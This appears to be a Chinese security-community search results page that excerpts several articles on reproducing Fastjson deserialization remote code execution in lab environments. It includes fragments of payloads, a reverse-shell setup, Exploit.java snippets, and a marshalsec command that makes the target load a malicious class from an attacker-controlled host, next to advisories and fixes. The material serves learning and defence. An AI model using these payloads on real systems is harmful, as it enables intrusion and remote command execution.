首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

漏洞复现 - - - Fastjson序列化漏洞

Java格式 3.什么是是反序列化 我们搞懂了什么是fastjson那我们理解一下序列化,反序列化又是什么意思呢 。...Fastjson漏洞产生原因 反序列化之后的数据本来是没有危害的,但是用户使用可控数据是有危害的 漏洞信息: fastjson 1.2.24 反序列化导致任意命令执行漏洞fastjson在解析json...Fastjson 1.2.47 远程命令执行漏洞fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令...取自合天网安实验室 二,漏洞利用(反弹shell) 靶机:Centos7+docker+fastjson1.2.25  IP地址:10.1.1.119:8080 攻击机:Kali   IP地址...Content-Type 修改为 application/json  然后将playload复制到bp发送 查看监听的端口,就复现成功  三, 漏洞修复 1. fastjson 版本至少升级到

1.3K20

漏洞复现Fastjson序列化

Fastjson序列化 最近log4j的漏洞很火,他的复现步骤和fastjson相似 所以来复现学习一些,希望对大家有一点帮助 一、简介 Java 序列化及反序列化处理在基于Java 架构的Web...三、Fastjson漏洞介绍 ​ 与原生的java反序列化相比,FastJson未使用readObject()方法进行反序列化,而是使用了自定义的一套方法,在反序列化的过程中,调用getter和setter...中发现了缓存机制可以绕过AutoType 1.2.68又通过缓存绕过了AutoType 从上述Fastjson序列化漏洞的演化历程可以看出,针对Fastjson漏洞挖掘主要在于以下两个方面。...2、fastjson<=1.2.41 第一个Fastjson序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数...,通过黑白名单的方式来防御Fastjson序列化漏洞,因此后面发现的Fastjson序列化漏洞都是针对黑名单的绕过来实现攻击利用的。

11010
您找到你想要的搜索结果了吗?
是的
没有找到

fastjson≤1.2.47反序列化漏洞复现

https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.27/bin/apache-tomcat-9.0.27.tar.gz FastJson1.2.47...环境,然后攻击机使用poc进行请求,完事 访问靶机界面: 0x04 漏洞利用 Exploit: import java.io.BufferedReader; import java.io.InputStream...main(String[] args) throws Exception {     } } 1.编译一下Exploit.java,生成Exploit.class,将2个文件放入服务器webapps/fastjson.../Exploit",     "autoCommit": true   } } 5.服务器的Ldap已接收到请求,靶机的/tmp/fastjson.test文件也已存在,命令成功执行 0x05 反弹shell...} } 0x06 坑点 1.未编译Exploit.java,只放入服务器1个.java文件 2.java反弹shell无法直接使用linux命令反弹 3.jdk版本需要注意,下方图片jdk版本不存在此漏洞

75820

fastjson漏洞原理与复现

fastjson在解析过程中会使用autotype来实例化某一个具体的类,autoType的作用就是来定位需要反序列化对象的位置,然后通过@type指定的内容来选择反序列化使用到的链为哪一条,那么我们通过此特性通过指定...datasourcename参数为我们的恶意class类,从而导致命令执行 fastjson 1.2.24-rce漏洞复现 环境地址 https://github.com/vulhub/vulhub 启动环境...docker-compose up -d 漏洞复现 写入如下代码进入java文件保存为rce.java文件 import java.lang.Runtime; import java.lang.Process...1.2.47-rce漏洞复现 描述 该漏洞为1.2.24白名单限制,可绕过白名单限制进行命令执行(与1.2.24原理相同) 环境地址 https://github.com/vulhub/vulhub...启动环境 docker-compose up -d 漏洞复现漏洞复现方式与fastjson 1.2.24相似,所以我们直接给出payload,连marshalsec项目监听的服务和python监听的

19820

技术分享 | Fastjson-RCE漏洞复现

Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。...当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。...影响版本 Fastjson1.2.47以及之前的版本 复现 1.1 环境准备 攻击机1 用于接受反弹shell 系统:Win10 x64 安装nc,burpsuite win10中需安装nc,用于监听反弹的...目录中发现两个jar包 受害机 系统:Ubuntu (与上述提供RMI和Web服务的机器可以是一台或不同) 需安装:docker、docker-composer、vulhub 1.2 示意图 1.3 复现流程...在 攻击机1 开启监听 在受害机上启动环境,进入vulhub中的/fastjson/1.2.47-rce/,使用如下命令启动服务: # docker-compose up -d 在 攻击机1 上访问该服务

1.2K41

干货|最全fastjson漏洞复现与绕过

序列化漏洞RCE 漏洞原理 fastjson在解析json对象时,会使用autoType实例化某一个具体的类,并调用set/get方法访问属性。...影响版本为 fastjson < 1.2.25 漏洞复现 首先进入fastjson 1.2.24的docker环境,使用java -version查看一下java的版本为1.8.0_102。...反序列化漏洞 漏洞原理 Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter...反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson序列化漏洞,因此后面发现的...Fastjson序列化漏洞都是针对黑名单绕过来实现攻击利用的目的的。

14.3K71

Fastjson序列化漏洞风险通告

最近,亚信安全CERT监控到Fastjson漏洞,下面是具体的描述。...亚信安全CERT监控到Fastjson Develop Team发布安全公告,修复了一个存在于Fastjson1.2.80及之前版本中的反序列化漏洞。...Fastjson已使用黑白名单用于防御反序列化漏洞,该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。...Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。...2,safeMode加固 Fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持autoType,可杜绝反序列化Gadgets类变种攻击

82290

关于fastjson特定版本RCE漏洞利用exp复现

0x02影响范围 Fastjson < 1.2.68 Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有 0x03漏洞复现 下面以Fastjson 1.2.47 为例子,因为vulhub有现成的环境十分方便...下面是流程示意图 主机A:存在fastjson序列化漏洞的主机 主机C:为RMI/LDAP服务 主机B:为构造的恶意类(包含要执行的命令) 在整个远程命令执行流程 1、黑客使用payload攻击主机...A(该payload需要指定rmi/ldap地址) 2、主机A引发反序列化漏洞,发送了进行rmi远程发放调用,去连接主机C 3、主机C的rmi服务指定加载主机B的恶意java类,所以主机A通过主机C的rmi...服务最终加载并执行主机B的恶意java类 4、主机A引发恶意系统命令执行 0x04复现流程 根据上图流程和环境复现: 主机A:http://1.1.1.1:8090 (存在Fastjson漏洞主机)...)发送fastjson序列化漏洞payload POST / HTTP/1.1 Host: 1.1.1.1:8090 Accept-Encoding: gzip, deflate Accept: */

1.6K50

实习记录(四) - Fastjson序列化漏洞

Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 JavaBean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。...漏洞检测 DNSLog回显 通过构造DNS解析来判断是否是FastjsonFastjson在解析下面这些Payload时会取解析val的值,从而可以在dnslog接收到回显,以此判断是不是Fastjson...1.2.24 反序列化导致任意命令执行漏洞 这里使用Vulhub/Fastjson-1.2.24-1.2.24-rce/进行搭建 抓包,修改一下然后提交,可以在DNSLog平台看到回显 // Payload...1.2.47 远程命令执行漏洞 Fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...参考 fastjson 1.2.24反序列化导致任意命令执行漏洞分析记录 fastjson =< 1.2.47 反序列化漏洞复现 JAVA反序列化FastJson组件 Fastjson漏洞复现) --

2.2K30

浅析FastJSON序列化漏洞(1.2.24——1.2.68)

https://github.com/alibaba/fastjson 项目地址 “自2017年3月15日,fastjson官方主动爆出其在1.2.24及之前版本存在远程代码执行高危安全漏洞以来,各种新型绕过姿势层出不穷...反序列化漏洞起源 我们可以看到,把JSON反序列化的语句是 JSON.parseObject(json,User.class),在指定JSON时,还需要指定其所属的类,显得代码就很臃肿,所以开发人员可以使用...Feature.SupportNonPublicField) ,可以直接为private成员赋值(不加Feature.SupportNonPublicField是无法对private成员赋值的) 各版本复现...TemplatesImpl 是的,就是7U21链里面的TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这个类本身就存在反序列化漏洞...但是由于_name 和_bytecodes 是私有属性,所以需要FASTJSON序列化接口有Feature.SupportNonPublicField参数才能实现,利用条件很苛刻,但是条件允许的话就很方便

15.3K22

Fastjson1.2.68反序列化复现(文末送书)

利用前提:fastjson <=1.2.68,打开了autotype 搭建环境 使用vul-hub 搭建漏洞环境 访问搭好的环境看到json数据就表示搭建成功 搭建攻击方web环境 假设攻击机为A...marshalsec java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.RMIRefServer"http://192.168.204.1/fastjson...scan 修复建议 1、升级 Fastjson 到最新版(>=1.2.68 新增了safemode, 彻底关闭autotype); 2、WAF拦截过滤请求包中的 @type、%u0040%...、漏洞利用等。...、嗅探欺骗、密码攻击、无线渗透…… 基于Kali Linux滚动更新(Kali Rolling)版本写作 重点介绍渗透测试三大环节:信息收集、漏洞扫描、漏洞利用 活动详情 为了感谢一直关注我们Khan安全攻防实验室的粉丝们

1.5K30

fastjson-cnvd-2017-02833漏洞复现 | Web漏洞挖掘班作业

文章来源|MS08067 Web安全漏洞挖掘实战班课后作业 本文作者:某学员A(Web漏洞挖掘实战班2期学员) 一、漏洞概述 fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型...,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链...在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。...二、影响版本 Fastjson1.2.24以及之前的所有版本 三、漏洞利用 创建TouchFile.java文件,内容如下: 使用javac TouchFile.java编译为class文件 使用mvn...并将content-type修改为application/json) 反弹shell成功,获得flag 总结: 使用payload攻击靶机(该payload需要指定rmi地址) 靶机引发反序列化漏洞

99610
领券